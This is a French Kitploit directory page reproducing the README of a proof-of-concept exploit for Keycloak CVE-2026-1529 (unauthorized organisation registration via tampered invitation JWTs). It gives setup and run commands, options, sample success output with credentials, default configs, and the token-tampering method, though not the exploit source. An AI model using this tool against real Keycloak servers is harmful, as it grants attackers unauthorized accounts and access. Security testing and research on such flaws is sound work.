Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation — CVE-2026-1529 (PoC) est une vulnérabilité critique dans Keycloak qui permet l'enregistrement non autorisé d'organisations via une validation inappropriée des jetons d'invitation. Cet outil d'exploitation démontre la vulnérabilité en manipulant les jetons JWT pour enregistrer des utilisateurs dans des organisations non autorisées. | Kitploit
Outils/GitHubGitHub/ninjazan420/cve-2026-1529-poc-keycloak-unauthorized-registration-via-improper-invitation-token-validation
Authentification et AutorisationAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationRed Teaming
GitHub

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
ninjazan420/cve-2026-1529-poc-keycloak-unauthorized-registration-via-improper-invitation-token-validation

CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation

Voir le dépôt
110il y a 7 moisPas encore vérifié

À propos

CVE-2026-1529 (PoC) est une vulnérabilité critique dans Keycloak qui permet l'enregistrement non autorisé d'organisations via une validation inappropriée des jetons d'invitation. Cet outil d'exploitation démontre la vulnérabilité en manipulant les jetons JWT pour enregistrer des utilisateurs dans des organisations non autorisées.

Partager

Outil d'exploitation Keycloak CVE-2026-1529

Keycloak : enregistrement non autorisé dans une organisation via une validation incorrecte du jeton d'invitation


Avertissement

Cet outil est réservé à des fins éducatives et de tests de sécurité. Utilisez-le uniquement sur des systèmes pour lesquels vous avez une autorisation explicite de tester. L'accès non autorisé à des systèmes informatiques est illégal et contraire à l'éthique. Les auteurs de cet outil ne sont pas responsables de toute utilisation abusive ou de tout dommage causé par ce logiciel.

Créé par : f3ds cr3w est, 2002


Présentation

CVE-2026-1529 est une vulnérabilité critique dans Keycloak qui permet l'enregistrement non autorisé d'organisations via une validation incorrecte du jeton d'invitation. Cet outil d'exploitation démontre la vulnérabilité en manipulant les jetons JWT pour inscrire des utilisateurs dans des organisations non autorisées.

Détails techniques

  • Identifiant CVE : CVE-2026-1529
  • Logiciel affecté : Keycloak (org.keycloak.services.resources.organizations)
  • Score CVSS : 8.1 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
  • Vecteur d'attaque : Réseau
  • Complexité d'attaque : Faible
  • Impact : Accès non autorisé aux ressources de l'organisation

Description de la vulnérabilité

La vulnérabilité réside dans le processus de validation des jetons JWT pour les invitations d'organisation. Les attaquants peuvent manipuler les champs org_id et email dans la charge utile du JWT, ce qui leur permet d'inscrire des utilisateurs dans n'importe quelle organisation sans autorisation appropriée.


Installation

Prérequis

  • Python 3.7 ou version ultérieure
  • Gestionnaire de paquets pip

Mise en place

  1. Clonez ou téléchargez l'outil d'exploitation :
git clone https://github.com/ninjazan420/CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation
cd CVE-2026-1529-POC
  1. Installez les dépendances requises :
pip install -r requirements.txt
  1. Rendez le script d'exploitation exécutable :
chmod +x keycloak-exploit.py

Utilisation

Utilisation de base

# Standard usage with target URL
python keycloak-exploit.py https://target-keycloak.com

# Show help
python keycloak-exploit.py -h

# Show version
python keycloak-exploit.py -v

Utilisation avancée

# Use custom invitation token
python keycloak-exploit.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 https://target-keycloak.com

# Use custom organization ID
python keycloak-exploit.py -o custom_org_id https://target-keycloak.com

# Use custom configuration file
python keycloak-exploit.py -c custom_config.json https://target-keycloak.com

# Enable debug logging
python keycloak-exploit.py -d https://target-keycloak.com

Options de la ligne de commande

OptionDescriptionRequis
targetURL Keycloak cible (IP ou domaine)Oui
-t, --tokenJeton d'invitation personnalisé à utiliserNon
-o, --org-idIdentifiant d'organisation personnaliséNon
-c, --configChemin vers le fichier de configurationNon
-d, --debugActiver la journalisation de débogageNon
-v, --versionAfficher les informations de versionNon
-h, --helpAfficher le message d'aideNon

Sortie

Exploitation réussie

Lorsque l'exploitation réussit, vous verrez une sortie comme :

=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✓ Target is vulnerable to CVE-2026-1529

🎯 EXPLOIT SUCCESSFUL!
Username: admin_user_2026
Password: KeycloakCVE2026!
Email: [email protected]
Login Link: https://target-keycloak.com/realms/master/account

📄 Report saved to: output/reports/exploit_report_20260210_134556.txt

🔐 Use the provided credentials to access the Keycloak instance!
⚠️  This demonstrates unauthorized access due to CVE-2026-1529

=============================================================
by f3ds cr3w est, 2002
=============================================================

Échec de l'exploitation

Si l'exploitation échoue, vous verrez :

=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✗ Target is not vulnerable

❌ EXPLOIT FAILED!
Check logs for details: logs/exploit.log

Structure du projet

CVE-2026-1529-POC/
├── keycloak-exploit.py          # Main exploit script
├── requirements.txt             # Python dependencies
├── README.md                   # This file
├── config/
│   └── default_config.json     # Default configuration
├── utils/
│   ├── jwt_utils.py            # JWT manipulation utilities
│   ├── http_utils.py           # HTTP client utilities
│   └── crypto_utils.py         # Cryptographic utilities
├── output/
│   ├── logs/                   # Log files
│   └── reports/                # Exploit reports

Configuration

Configuration par défaut

L'outil utilise un fichier de configuration par défaut (config/default_config.json) avec les paramètres suivants :

{
  "exploit": {
    "default_username": "admin_user_2026",
    "default_password": "KeycloakCVE2026!",
    "default_email": "[email protected]",
    "timeout": 30,
    "max_retries": 3
  },
  "jwt": {
    "algorithm": "HS256",
    "secret_key": "keycloak-cve-2026-1529-exploit",
    "token_expiry": 3600
  },
  "target": {
    "endpoints": {
      "realms": "/realms",
      "organizations": "/organizations",
      "register": "/register",
      "login": "/login"
    }
  },
  "output": {
    "log_level": "INFO",
    "save_reports": true,
    "report_format": "txt"
  }
}

Configuration personnalisée

Vous pouvez créer un fichier de configuration personnalisé et l'utiliser avec l'option -c :

{
  "exploit": {
    "default_username": "custom_user",
    "default_password": "CustomPassword123!",
    "default_email": "[email protected]",
    "timeout": 60,
    "max_retries": 5
  },
  "jwt": {
    "algorithm": "HS256",
    "secret_key": "custom-secret-key",
    "token_expiry": 7200
  }
}

Détails techniques

Processus d'exploitation

  1. Analyse de la cible : Vérifier si la cible est une instance Keycloak vulnérable
  2. Génération du jeton : Générer ou utiliser un jeton d'invitation personnalisé
  3. Manipulation du jeton : Manipuler la charge utile du JWT pour changer l'identifiant de l'organisation
  4. Inscription de l'utilisateur : Inscrire un utilisateur à l'aide du jeton manipulé
  5. Test de connexion : Vérifier que l'utilisateur créé peut se connecter
  6. Génération du rapport : Créer un rapport d'exploitation détaillé

Manipulation du JWT

L'outil exploite la validation JWT incorrecte en :

  1. Décodant le jeton JWT sans vérification de la signature
  2. Modifiant le champ org_id pour cibler une autre organisation
  3. Modifiant le champ email si nécessaire
  4. Réencodant le jeton avec la charge utile manipulée

Considérations de sécurité

  • L'outil utilise une gestion des erreurs et une journalisation appropriées
  • Toutes les requêtes réseau incluent des en-têtes appropriés
  • Une validation des entrées est effectuée sur toutes les entrées utilisateur
  • L'outil respecte les codes de réponse du serveur cible

Dépannage

Problèmes courants

  1. Erreurs de connexion
    • Vérifiez si l'URL cible est accessible
    • Vérifiez que la cible est une instance Keycloak
    • Vérifiez la connectivité réseau et les paramètres du pare-feu
Télécharger l’outil